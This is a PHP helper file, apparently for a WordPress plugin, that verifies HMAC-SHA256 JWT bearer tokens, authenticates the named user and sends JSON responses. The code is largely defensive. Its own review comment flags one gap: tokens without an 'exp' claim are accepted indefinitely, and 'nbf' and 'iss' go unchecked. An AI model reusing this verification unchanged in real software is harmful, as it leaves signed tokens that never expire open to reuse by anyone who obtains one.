<?php
/**
* JWT Authentication Helper
* Provides JWT token verification for API endpoints
*/
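/**
 * Verify the JWT sent as a Bearer token and authenticate the WordPress user it names.
 *
 * The token is read from the Authorization header, its signature is recomputed
 * as HMAC-SHA256 over "header.payload" with JWT_AUTH_SECRET_KEY, and on success
 * the user in data.user.id becomes the current user via wp_set_current_user().
 *
 * The algorithm is fixed here: the token's own "alg" header is never consulted,
 * so a token cannot select a different algorithm.
 *
 * NOTE(review): "exp" is enforced only when the claim is present, so a signed
 * token without it is accepted indefinitely; "nbf" and "iss" are not checked.
 * Confirm that whatever issues these tokens always sets "exp".
 *
 * @return mixed The user id from the token payload when valid, false otherwise.
 */
function verify_jwt_token() {
    $auth_header = isset($_SERVER['HTTP_AUTHORIZATION']) ? $_SERVER['HTTP_AUTHORIZATION'] : '';

    // Some server setups do not populate HTTP_AUTHORIZATION; fall back to the raw
    // request headers. Header names are case-insensitive, so match accordingly.
    if (empty($auth_header) && function_exists('apache_request_headers')) {
        $headers = apache_request_headers();
        if (is_array($headers)) {
            foreach ($headers as $name => $value) {
                if (strcasecmp((string) $name, 'Authorization') === 0) {
                    $auth_header = $value;
                    break;
                }
            }
        }
    }

    if (!is_string($auth_header) || $auth_header === '') {
        return false;
    }

    // Anchored: the header must be exactly "Bearer <token>", not merely contain it.
    if (!preg_match('/^\s*Bearer\s+(\S+)\s*$/i', $auth_header, $matches)) {
        return false;
    }
    $token = $matches[1];

    // Fail closed when no signing key is configured.
    $secret_key = defined('JWT_AUTH_SECRET_KEY') ? JWT_AUTH_SECRET_KEY : false;
    if (!is_string($secret_key) || !$secret_key) {
        return false;
    }

    try {
        $token_parts = explode('.', $token);
        if (count($token_parts) !== 3) {
            return false;
        }
        list($header, $payload, $signature) = $token_parts;

        // Recompute the signature and encode it as unpadded base64url, the form
        // used in the token itself.
        $valid_signature = hash_hmac('sha256', "$header.$payload", $secret_key, true);
        $valid_signature = rtrim(strtr(base64_encode($valid_signature), '+/', '-_'), '=');

        // Constant-time comparison: a plain !== can leak, through response timing,
        // how many leading characters of a guessed signature are correct.
        if (!hash_equals($valid_signature, $signature)) {
            return false;
        }

        // The payload is only decoded after the signature has been verified.
        $payload_data = json_decode(base64_decode(strtr($payload, '-_', '+/')), true);
        if (!is_array($payload_data) || !isset($payload_data['data']['user']['id'])) {
            return false;
        }

        // Reject expired tokens, and tokens whose "exp" is not a number at all
        // (a non-numeric value would otherwise be compared as a string).
        if (isset($payload_data['exp'])) {
            if (!is_numeric($payload_data['exp']) || $payload_data['exp'] < time()) {
                return false;
            }
        }

        $user_id = $payload_data['data']['user']['id'];

        // The account must still exist; a valid token for a deleted user is refused.
        $user = get_user_by('id', $user_id);
        if (!$user) {
            return false;
        }

        wp_set_current_user($user_id);
        return $user_id;
    } catch (Exception $e) {
        // Any failure during verification is treated as "not authenticated".
        return false;
    }
}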
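/**
 * Send a JSON response and terminate the request.
 *
 * @param mixed $data        Value to serialise with json_encode().
 * @param int   $status_code HTTP status code to send (default 200).
 */
function send_json_response($data, $status_code = 200) {
    $body = json_encode($data);
    if ($body === false) {
        // json_encode() failed (e.g. invalid UTF-8 in $data). Report a server
        // error instead of sending an empty body under the caller's status code.
        $status_code = 500;
        $body = '{"success":false,"message":"Response encoding failed"}';
    }

    if (!headers_sent()) {
        // Declare the body as JSON explicitly. Without this the response goes out
        // under PHP's default content type, and a browser may interpret any
        // caller-supplied strings in the payload as markup.
        header('Content-Type: application/json; charset=utf-8');
    }

    http_response_code($status_code);
    echo $body;
    exit;
}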
/**
 * Send a JSON error envelope and terminate the request.
 *
 * The body is {"success": false, "message": <message>}; sending it and ending
 * the request are delegated to send_json_response().
 *
 * @param mixed $message     Error text placed in the "message" field.
 * @param int   $status_code HTTP status code to send (default 400).
 */
function send_error_response($message, $status_code = 400) {
    $error_body = array();
    $error_body['success'] = false;
    $error_body['message'] = $message;

    send_json_response($error_body, $status_code);
}
?>